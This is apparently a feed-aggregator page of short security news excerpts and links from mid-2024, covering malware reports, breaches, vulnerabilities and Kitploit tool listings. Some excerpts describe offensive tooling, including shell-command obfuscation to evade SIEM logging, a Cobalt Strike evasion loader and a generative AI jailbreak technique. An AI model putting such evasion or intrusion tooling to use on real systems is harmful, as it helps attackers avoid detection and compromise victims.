Table of Contents This report is a summarized version of “Analysis Report of Kimsuky Group’s HappyDoor Malware” introduced in AhnLab Threat Intelligence Platform (TIP), containing key information for analyzing breaches. The report in AhnLab TIP includes details on encoding & encryption methods, packet structure, and more in addition to the characteristics and features of the malware. In particular, it also provides an IDA plugin and a backdoor test server developed by AhnLab for the convenience of analysts. Note that the masked...
The post Kimsuky Group’s New Backdoor (HappyDoor) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67660/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What HackerOne Customers Say About Remediating Vulnerabilities and Getting the Best Results From Hackers
Learn how HackerOne customers remediate vulnerabilities and get the best results and value from ethical hackers.
https://www.hackerone.com/customer-stories/get-the-most-from-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Social media and teen mental health – Week in security with Tony Anscombe
Social media sites are designed to make their users come back for more. Do laws restricting children's exposure to addictive social media feeds have teeth or are they a political gimmick?
https://www.welivesecurity.com/en/videos/social-media-teen-mental-health-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Polyfill.io Supply Chain Attack
What is the attack?Over 100,000+ sites have been impacted by a supply chain attack involving the Polyfill.io service. Polyfill is a popular tool used for enhancing browser capabilities by hundreds of thousands of sites to ensure that all website visitors can use the same codebase for unsupported functionality. Earlier this year, the polyfill.io domain was purchased, and the script was modified to redirect users to malicious and scam sites.What is the recommended Mitigation?Given the confirmed malicious operations, owners of websites using polyfill.io are advised to remove it immediately and search their code repositories for instances of polyfill.io. Users are also advised to consider using alternate services provided by Cloudflare and Fastly.What FortiGuard Coverage is available?Fortinet's...
https://fortiguard.fortinet.com/threat-signal-report/5478
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Attack Cases Against HTTP File Server (HFS) (CVE-2024-23692)
HTTP File Server (HFS) is a program that provides a simple type of web service. Because it can provide web services with just an executable file without having to build a web server, it is often used for sharing files, allowing users to connect to the address through web browsers and easily download files. Because HFS is exposed to the public in order to enable users to connect to the HFS web server and download files, it can be a...
The post Attack Cases Against HTTP File Server (HFS) (CVE-2024-23692) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67650/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Linux Defense Evasion Techniques Detected by AhnLab EDR (2)
The blog post “Linux Defense Evasion Techniques Detected by AhnLab EDR (1)” [1] covered methods where the threat actors and malware strains attacked Linux servers before incapacitating security services such as firewalls and security modules and then concealing the installed malware. This post will cover additional defense evasion techniques against Linux systems not covered in the past post. For example, methods of concealing malware include having the running malware delete itself to not be noticed by an administrator, or deleting...
The post Linux Defense Evasion Techniques Detected by AhnLab EDR (2) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67636/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Dissecting GootLoader With Node.js
We demonstrate effective methods to circumvent anti-analysis evasion techniques from GootLoader, a backdoor and loader malware distributed through fake forum posts.
The post Dissecting GootLoader With Node.js appeared first on Unit 42.
https://unit42.paloaltonetworks.com/javascript-malware-gootloader/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Not-So-Secret Network Access Broker x999xx
Most accomplished cybercriminals go out of their way to separate their real names from their hacker handles. But among certain old-school Russian hackers it is not uncommon to find major players who have done little to prevent people from figuring out who they are in real life. A case study in this phenomenon is "x999xx," the nickname chosen by a venerated Russian hacker who specializes in providing the initial network access to various ransomware groups.
https://krebsonsecurity.com/2024/07/the-not-so-secret-network-access-broker-x999xx/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Does your business have an AI blind spot? Navigating the risks of shadow AI
With AI now an integral part of business operations, shadow AI has become the next frontier in information security. Here’s what that means for managing risk. For many organizations, 2023 was the breakout year for generative AI. Now, large language models (LLMs) like ChatGPT have become household names. In the business world, they’re already deeply […]
The post Does your business have an AI blind spot? Navigating the risks of shadow AI appeared first on Security Intelligence.
https://securityintelligence.com/articles/does-your-business-have-ai-blind-spot/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability
This threat brief details CVE-2024-6387, called RegreSSHion, an RCE vulnerability affecting connectivity tool OpenSSH servers on glibc-based Linux systems.
The post Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability appeared first on Unit 42.
https://unit42.paloaltonetworks.com/threat-brief-cve-2024-6387-openssh/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerabilities in PanelView Plus devices could lead to remote code execution
Microsoft discovered and responsibly disclosed two vulnerabilities in Rockwell's PanelView Plus that could be remotely exploited by unauthenticated attackers, allowing them to perform remote code execution (RCE) and denial-of-service (DoS). PanelView Plus devices are graphic terminals, which are known as human machine interface (HMI) and are used in the industrial space.
The post Vulnerabilities in PanelView Plus devices could lead to remote code execution appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/02/vulnerabilities-in-panelview-plus-devices-could-lead-to-remote-code-execution/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
It all adds up: Pretexting in executive compromise
Executives hold the keys to the corporate kingdom. If attackers can gain the trust of executives using layered social engineering techniques, they may be able to access sensitive corporate information such as intellectual property, financial data or administrative control logins and passwords. While phishing remains the primary pathway to executive compromise, increasing C-suite awareness of […]
The post It all adds up: Pretexting in executive compromise appeared first on Security Intelligence.
https://securityintelligence.com/articles/pretexting-in-executive-compromise-social-engineering/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Strategies to accelerate dependency management for modern enterprise software development
Contrary to common belief, security and productivity are not necessarily at odds in modern software development.
https://www.sonatype.com/blog/strategies-to-accelerate-dependency-management-for-modern-enterprise-software-development
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
March 2024 Cyber Attacks Statistics
In March 2024 I collected and analyzed 203 events dominated by malware attacks. Cyber Crime continued to lead the Motivations chart with 72.9%, ahead of Cyber Espionage with 13.3%, Cyber Warfare (5.9%) and Hacktivism (2.5%).
https://www.hackmageddon.com/2024/07/02/march-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Operation Endgame: The ultimate troll patrol.
https://www.proofpoint.com/us/newsroom/news/operation-endgame-ultimate-troll-patrol
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SAML Raider Release 2.0.0
SAML Raider is a Burp Suite extension and the tool of choice for many pentesters for testing SAML infrastructures. This blog post should give a brief introduction to what has changed in the new version 2.0.0. From Improving developer and user experience to bug fixes.
https://blog.compass-security.com/2024/07/saml-raider-release-2-0-0/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ChatGPT 4 can exploit 87% of one-day vulnerabilities
Since the widespread and growing use of ChatGPT and other large language models (LLMs) in recent years, cybersecurity has been a top concern. Among the many questions, cybersecurity professionals wondered how effective these tools were in launching an attack. Cybersecurity researchers Richard Fang, Rohan Bindu, Akul Gupta and Daniel Kang recently performed a study to […]
The post ChatGPT 4 can exploit 87% of one-day vulnerabilities appeared first on Security Intelligence.
https://securityintelligence.com/articles/chatgpt-4-exploits-87-percent-one-day-vulnerabilities/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Strengthening Microsoft 365 with Human-centric Security
https://www.proofpoint.com/us/newsroom/news/strengthening-microsoft-365-human-centric-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Xctdoor Malware Used in Attacks Against Korean Companies (Andariel)
AhnLab SEcurity intelligence Center (ASEC) recently discovered a case where an unidentified threat actor exploited a Korean ERP solution to carry out an attack. After infiltrating the system, the threat actor is believed to have attacked the update server of a specific Korean ERP solution to take control of systems within the company. In another attack case, a vulnerable web server was attacked to distribute malware. The targets of these attacks have been identified as the Korean defense and manufacturing...
The post Xctdoor Malware Used in Attacks Against Korean Companies (Andariel) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67558/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Introducing HackerOne's Hai API: Revolutionize Your Workflow Automation with AI
Learn about Hai API: designed specifically for customers seeking efficient interaction and automation capabilities.
https://www.hackerone.com/ai/hai-api
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
What Is Application Security Posture Management (ASPM): A Comprehensive Guide
Get details on what ASPM is, the problems it solves, and what to look for.
https://www.legitsecurity.com/blog/what-is-application-security-posture-management-aspm
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Contrastive Credibility Propagation Algorithm in Action: Improving ML-powered Data Loss Prevention
Our novel contrastive credibility propagation algorithm improves on data loss prevention and has unique applications to sensitive material.
The post The Contrastive Credibility Propagation Algorithm in Action: Improving ML-powered Data Loss Prevention appeared first on Unit 42.
https://unit42.paloaltonetworks.com/contrastive-credibility-propagation/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
16-31 March 2024 Cyber Attacks Timeline
In the second timeline of March 2024 I collected 104 events dominated by malware, exploitation of vulnerabilities and ransomware. The threat landscape was also characterized by several mega breaches, multiple cyber espionage operations and also some remarkable events related to cyber warfare.
https://www.hackmageddon.com/2024/06/28/16-31-march-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ticketek - 17,643,173 breached accounts
In May 2024, the Australian event ticketing company Ticketek reported a data breach linked to a third party cloud-based platform. The following month, the data appeared for sale on a popular hacking forum and was later linked to a series of breaches of the Snowflake cloud storage service. The data contained almost 30M rows with 17.6M unique email addresses alongside names, genders, dates of birth and hashed passwords.
https://haveibeenpwned.com/PwnedWebsites#Ticketek
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sustaining Digital Certificate Security - Entrust Certificate Distrust
Posted by Chrome Root Program, Chrome Security Team
.code {
font-family: "Courier New", Courier, monospace;
font-size: 11.8px;
font-weight: bold;
background-color: #f4f4f4;
padding: 10px;
border: 1px solid #ccc;
border-radius: 2px;
white-space: pre-wrap;
display: inline-block;
line-height: 12px;
}
.highlight {
color: red;
}
The Chrome Security Team prioritizes the security and privacy of Chrome's users, and we are unwilling to compromise on these values.
The Chrome Root Program Policy states that CA certificates included in the Chrome Root Store must provide value to Chrome end users that exceeds the risk of their continued inclusion. It also describes many of the factors we consider significant when CA Owners disclose and respond...
http://security.googleblog.com/2024/06/sustaining-digital-certificate-security.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Virtual Escape; Real Reward: Introducing Google's kvmCTF
Marios Pomonis, Software EngineerGoogle is committed to enhancing the security of open-source technologies, especially those that make up the foundation for many of our products, like Linux and KVM. To this end we are excited to announce the launch of kvmCTF, a vulnerability reward program (VRP) for the Kernel-based Virtual Machine (KVM) hypervisor first announced in October 2023.KVM is a robust hypervisor with over 15 years of open-source development and is widely used throughout the consumer and enterprise landscape, including platforms such as Android and Google Cloud. Google is an active contributor to the project and we designed kvmCTF as a collaborative way to help identify & remediate vulnerabilities and further harden this fundamental security boundary. Similar to kernelCTF,...
http://security.googleblog.com/2024/06/virtual-escape-real-reward-introducing.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Windows Registry Adventure #3: Learning resources
@import url(https://themes.googleusercontent.com/fonts/css?kit=4mNYFHt_IKFsPe52toizHz0e5qzIIUg9OvSRGeMDk3I);
.lst-kix_80vdbxrca7qi-0>li:before {
content: "25cf "
}
ul.lst-kix_pv42b0usiw40-7 {
list-style-type: none
}
ul.lst-kix_pv42b0usiw40-8 {
list-style-type: none
}
.lst-kix_80vdbxrca7qi-5>li:before {
content: "25a0 "
}
.lst-kix_80vdbxrca7qi-4>li:before {
content: "25cb "
}
.lst-kix_80vdbxrca7qi-2>li:before {
content: "25a0 "
}
.lst-kix_80vdbxrca7qi-3>li:before {
content: "25cf "
}
.lst-kix_80vdbxrca7qi-1>li:before {
content: "25cb "
}
ol.lst-kix_hmg5xw3mb42j-2.start {
counter-reset: lst-ctn-kix_hmg5xw3mb42j-2...
https://googleprojectzero.blogspot.com/2024/06/the-windows-registry-adventure-3.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Software composition analysis (SCA): A beginner's guide
In modern software development, applications are rarely built from scratch. Development teams extensively rely upon open source software components to accelerate development and foster innovation in software supply chains.
https://www.sonatype.com/blog/software-composition-analysis-sca-a-beginners-guide
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New InnoSetup Malware Created Upon Each Download Attempt
AhnLab SEcurity intelligence Center (ASEC) has discovered the distribution of a new type of malware that is disguised as cracks and commercial tools. Unlike past malware which performed malicious behaviors immediately upon being executed, this malware displays an installer UI and malicious behaviors are executed upon clicking buttons during the installation process. It is deemed that when the user makes a download request, a malware is instantly created to give a reply instead of distributing pre-made malware. This means that...
The post New InnoSetup Malware Created Upon Each Download Attempt appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67502/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DBatLoader Distributed via CMD Files
AhnLab SEcurity intelligence Center (ASEC) has recently discovered malware being distributed through CMD files and identified it as a downloader called DBatLoader (ModiLoader) that had been distributed before via phishing emails in RAR file format containing an EXE file. The file contained “FF, FE” which means “UTF-16LE”, so when the internal code was opened with a text editor, the content of the code was not displayed correctly. However, if “FF, FE” is deleted or the file is converted to”UTF-8″, the...
The post DBatLoader Distributed via CMD Files appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67468/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Mitigating Skeleton Key, a new type of generative AI jailbreak technique
Microsoft recently discovered a new type of generative AI jailbreak method called Skeleton Key that could impact the implementations of some large and small language models. This new method has the potential to subvert either the built-in model safety or platform safety systems and produce any content. It works by learning and overriding the intent of the system message to change the expected behavior and achieve results outside of the intended use of the system.
The post Mitigating Skeleton Key, a new type of generative AI jailbreak technique appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/06/26/mitigating-skeleton-key-a-new-type-of-generative-ai-jailbreak-technique/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Working with a cybersecurity committee of the board
Learn about the rise of cybersecurity committees and how the CISO and IT security team can work with them to produce the best result for the organization's IT security and enable digital transformation.
The post Working with a cybersecurity committee of the board appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/06/26/working-with-a-cybersecurity-committee-of-the-board/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Polyfill.io supply chain attack hits 100,000+ websites — all you need to know
In a significant supply chain attack, over 100,000 websites using Polyfill[.]io, a popular JavaScript CDN service, were compromised.
https://www.sonatype.com/blog/polyfill.io-supply-chain-attack-hits-100000-websites-all-you-need-to-know
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Exploit creator selling 250+ reserved npm packages on Telegram
Recently, the Sonatype Security Research team identified more than 250 npm packages which are lucrative and convincing exploits, because these are named exactly like the open source projects coming from Amazon Web Services (AWS), Microsoft, React, CKEditor, among other popular names.
https://www.sonatype.com/blog/exploit-creator-selling-250-reserved-npm-packages-via-telegram
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife
Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine. Main Features - Wayback Crawler Machine- Google Dorking without limits- Github Information Grabbing- Subdomain Identifier - Cms/Technology Detector With Custom Headers Installation ~> git clone https://github.com/ankitdobhal/Ashok~> cd Ashok~> python3.7 -m pip3 install -r requirements.txt How to use Ashok? A detailed usage guide is available on Usage section of the Wiki. But Some index of options is given below:...
http://www.kitploit.com/2024/06/ashok-osint-recon-tool-aka-swiss-army.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
America's drinking water is facing attack, with links back to China, Russia and Iran
https://www.proofpoint.com/us/newsroom/news/americas-drinking-water-facing-attack-links-back-china-russia-and-iran
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Maven Central and the tragedy of the commons
The tragedy of the commons is a concept in economics and ecology that describes a situation where individuals, acting in their own self-interest, collectively deplete a shared resource. In simpler terms, it's the idea that when a resource is available to everyone without restriction, some individuals tend to overuse it, leading to its eventual depletion and harming everyone in the long run. In the case of Maven Central, we are experiencing an unwitting tyranny by the few.
https://www.sonatype.com/blog/maven-central-and-the-tragedy-of-the-commons
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Attackers Exploiting Public Cobalt Strike Profiles
Unit 42 researchers examine how attackers use publicly available Malleable C2 profiles, examining their structure to reveal evasive techniques.
The post Attackers Exploiting Public Cobalt Strike Profiles appeared first on Unit 42.
https://unit42.paloaltonetworks.com/attackers-exploit-public-cobalt-strike-profiles/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to boost your incident response readiness
Discover key steps to bolster incident response readiness, from disaster recovery plans to secure deployments, guided by insights from the Microsoft Incident Response team.
The post How to boost your incident response readiness appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/06/25/how-to-boost-your-incident-response-readiness/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hacking for Defenders: approaches to DARPA's AI Cyber Challenge
Oliver Chang, Jonathan Metzman, OSS-Fuzz and Alex Rebert, Security EngineeringThe US Defense Advanced Research Projects Agency, DARPA, recently kicked off a two-year AI Cyber Challenge (AIxCC), inviting top AI and cybersecurity experts to design new AI systems to help secure major open source projects which our critical infrastructure relies upon. As AI continues to grow, it's crucial to invest in AI tools for Defenders, and this competition will help advance technology to do so. Google's OSS-Fuzz and Security Engineering teams have been excited to assist AIxCC organizers in designing their challenges and competition framework. We also playtested the competition by building a Cyber Reasoning System (CRS) tackling DARPA's exemplar challenge. This blog post will share our approach...
http://security.googleblog.com/2024/06/hacking-for-defenders-approaches-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CloudBrute - Awesome Cloud Enumerator
A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike. The complete writeup is available. here Motivation we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers. Here is the list issues on previous approaches we tried to fix: separated wordlists lack of proper concurrency lack of supporting all major cloud providers require authentication or keys or cloud CLI access...
http://www.kitploit.com/2024/06/cloudbrute-awesome-cloud-enumerator.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybersecurity in the SMB space — a growing threat
Kaspersky analysts explain which applications are targeted the most, and how enterprises can protect themselves from phishing and spam.
https://securelist.com/smb-threat-report-2024/113010/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Hfinger - Fingerprinting HTTP Requests
Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-) Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable. Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted...
http://www.kitploit.com/2024/06/hfinger-fingerprinting-http-requests.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fake software fixes fuel money-stealing malware threat
https://www.proofpoint.com/us/newsroom/news/fake-software-fixes-fuel-money-stealing-malware-threat
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
XZ backdoor: Hook analysis
In this article, we analyze XZ backdoor behavior inside OpenSSH, after it has achieved RSA-related function hook.
https://securelist.com/xz-backdoor-part-3-hooking-ssh/113007/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Advance Auto Parts - 79,243,727 breached accounts
In June 2024, Advance Auto Parts confirmed they had suffered a data breach which was posted for sale to a popular hacking forum. Linked to unauthorised access to Snowflake cloud services, the breach exposed a large number of records related to both customers and employees. In total, 79M unique email addresses were included in the breach, alongside names, phone numbers, addresses and further data attributes related to company employees.
https://haveibeenpwned.com/PwnedWebsites#AdvanceAutoParts
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
DORA ICT risk management framework: What to know
The Digital Operational Resilience Act, or DORA, focuses on limiting how disruptive cyberattacks are to financial institutions. One of its key characteristics is that it views open source analysis, also known as software composition analysis (SCA), as a basic security requirement that all institutions under its guidance must develop as a capability.
https://www.sonatype.com/blog/dora-ict-risk-management-framework-what-to-know
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
VulnNodeApp - A Vulnerable Node.Js Application
A vulnerable application made using node.js, express server and ejs template engine. This application is meant for educational purposes only. Setup Clone this repository git clone https://github.com/4auvar/VulnNodeApp.git Application setup: Install the latest node.js version with npm. Open terminal/command prompt and navigate to the location of downloaded/cloned repository. Run command: npm install DB setup Install and configure latest mysql version and start the mysql service/deamon Login with root user in mysql and run below sql script: CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';create database vuln_node_app_db;GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';USE vuln_node_app_db;create table users (id int AUTO_INCREMENT PRIMARY...
http://www.kitploit.com/2024/06/vulnnodeapp-vulnerable-nodejs.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues
XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments. Here's what to do for each environment: Run installation and then get started. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png). If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md). When you're done learning the attack, clean up. Requirements Azure tenant Terafform version 1.0.9 or above Azure CLI Azure User with Owner permissions on Subscription and Global Admin...
http://www.kitploit.com/2024/06/xmgoat-composed-of-xm-cyber-terraform.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Extrude - Analyse Binaries For Missing Security Features, Information Disclosure And More...
Analyse binaries for missing security features, information disclosure and more. Extrude is in the early stages of development, and currently only supports ELF and MachO binaries. PE (Windows) binaries will be supported soon. Usage Usage: extrude [flags] [file]Flags: -a, --all Show details of all tests, not just those which failed. -w, --fail-on-warning Exit with a non-zero status even if only warnings are discovered. -h, --help help for extrude Docker You can optionally run extrude with docker via: docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile Supported Checks ELF PIE RELRO BIND NOW Fortified Source Stack Canary NX Stack MachO PIE Stack Canary NX Stack NX Heap ARC Windows Coming soon... TODO Add support for PE Add secret scanning...
http://www.kitploit.com/2024/06/extrude-analyse-binaries-for-missing.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scanning for TP-Link Wifi Router Vulnerability Increases by 100%
The TP-Link Archer AX21 Wifi Router vulnerability CVE-2023-1389 experiences massive targeting along with a rather old critical RCE in PHPUnit.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-may-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
KrebsOnSecurity Threatened with Defamation Lawsuit Over Fake Radaris CEO
On March 8, 2024, KrebsOnSecurity published a deep dive on the consumer data broker Radaris, showing how the original owners are two men in Massachusetts who operated multiple Russian language dating services and affiliate programs, in addition to a dizzying array of people-search websites. The subjects of that piece are threatening to sue KrebsOnSecurity for defamation unless the story is retracted. Meanwhile, their attorney has admitted that the person Radaris named as the CEO from its inception is a fabricated identity.
https://krebsonsecurity.com/2024/06/krebsonsecurity-threatened-with-defamation-lawsuit-over-fake-radaris-ceo/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models
@import url(https://themes.googleusercontent.com/fonts/css?kit=DFQxm4rd7fRHgM9OTejWVT5Vho6BE7M80rHXEVKqXWckOnM5xqt2DUw2f5lNcrroidEvLLi3H0BPvcL7ypcd6c76ZZ8PqJ7WOKqynLI9-xo);.lst-kix_s8mzwdo5vrhy-8>li:before{content:"25a0 "}ol.lst-kix_s8mzwdo5vrhy-0{list-style-type:none}.lst-kix_s8mzwdo5vrhy-5>li:before{content:"25a0 "}.lst-kix_s8mzwdo5vrhy-0>li{counter-increment:lst-ctn-kix_s8mzwdo5vrhy-0}.lst-kix_s8mzwdo5vrhy-6>li:before{content:"25cf "}li.li-bullet-0:before{margin-left:-18pt;white-space:nowrap;display:inline-block;min-width:18pt}.lst-kix_s8mzwdo5vrhy-7>li:before{content:"25cb "}ol.lst-kix_s8mzwdo5vrhy-0.start{counter-reset:lst-ctn-kix_s8mzwdo5vrhy-0 0}ul.lst-kix_s8mzwdo5vrhy-7{list-style-type:none}.lst-kix_s8mzwdo5vrhy-0>li:before{content:"" counter(lst-ctn-kix_s8mzwdo5vrhy-0,decimal)...
https://googleprojectzero.blogspot.com/2024/06/project-naptime.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Staying Safe with Chrome Extensions
Posted by Benjamin Ackerman, Anunoy Ghosh and David Warren, Chrome Security Team
.code {
background-color: #f4f4f4;
border: 1px solid #ccc;
border-radius: 4px;
padding: 13px;
}
.highlight {
color: red;
}
Chrome extensions can boost your browsing, empowering you to do anything from customizing the look of sites to providing personalized advice when you're planning a vacation. But as with any software, extensions can also introduce risk.
That's why we have a team whose only job is to focus on keeping you safe as you install and take advantage of Chrome extensions. Our team:
Provides you with a personalized summary of the extensions you've installed
Reviews extensions before they're published on the Chrome Web Store
Continuously monitors...
http://security.googleblog.com/2024/06/staying-safe-with-chrome-extensions.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BokuLoader - A Proof-Of-Concept Cobalt Strike Reflective Loader Which Aims To Recreate, Integrate, And Enhance Cobalt Strike's Evasion Features!
A proof-of-concept User-Defined Reflective Loader (UDRL) which aims to recreate, integrate, and enhance Cobalt Strike's evasion features! Contributors: Contributor Twitter Notable Contributions Bobby Cooke @0xBoku Project original author and maintainer Santiago Pecin @s4ntiago_p Reflective Loader major enhancements Chris Spehn @ConsciousHacker Aggressor scripting Joshua Magri @passthehashbrwn IAT hooking Dylan Tran @d_tranman Reflective Call Stack Spoofing James Yeung @5cript1diot Indirect System Calls UDRL Usage Considerations The built-in Cobalt Strike reflective loader is robust, handling all Malleable PE evasion features Cobalt Strike has to offer. The major disadvantage to using a custom UDRL is Malleable PE evasion features may or may not be supported out-of-the-box....
http://www.kitploit.com/2024/06/bokuloader-proof-of-concept-cobalt.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Volana - Shell Command Obfuscation To Avoid Detection Systems
Shell command obfuscation to avoid SIEM/detection system During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.volana provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage Usage You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed ## Download it from github release##...
http://www.kitploit.com/2024/06/volana-shell-command-obfuscation-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New Google Chrome Warning—You Must Never Copy And Paste This Text
https://www.proofpoint.com/us/newsroom/news/new-google-chrome-warning-you-must-never-copy-and-paste-text
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Microsoft Defender Experts for XDR recognized in the latest MITRE Engenuity ATT&CK® Evaluation for Managed Services
Microsoft Defender Experts for XDR delivered excellent results during round 2 of the MITRE Engenuity ATT&CK® Evaluations for Managed Services menuPass + ALPHV BlackCat.
The post Microsoft Defender Experts for XDR recognized in the latest MITRE Engenuity ATT&CK® Evaluation for Managed Services appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/06/18/microsoft-defender-experts-for-xdr-recognized-in-the-latest-mitre-engenuity-attck-evaluation-for-managed-services/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CyberChef - The Cyber Swiss Army Knife - A Web App For Encryption, Encoding, Compression And Data Analysis
CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more. The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Live demo CyberChef is still under active development. As a result, it shouldn't be considered a finished product....
http://www.kitploit.com/2024/06/cyberchef-cyber-swiss-army-knife-web.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New Diamorphine rootkit variant seen undetected in the wild
Introduction Code reuse is very frequent in malware, especially for those parts of the sample that are complex to develop or hard to write with an essentially different alternative code. By tracking both source code and object code, we efficiently detect new malware and track the evolution of existing malware in-the-wild. Diamorphine is a well-known […]
The post New Diamorphine rootkit variant seen undetected in the wild appeared first on Avast Threat Labs.
https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/?utm_source=rss&utm_medium=rss&utm_campaign=new-diamorphine-rootkit-variant-seen-undetected-in-the-wild
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Analysis of user password strength
Kaspersky experts conducted a study of password resistance to attacks that use brute force and smart guessing techniques.
https://securelist.com/password-brute-force-time/112984/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Introducing Conkeyscan – Confluence Keyword Scanner
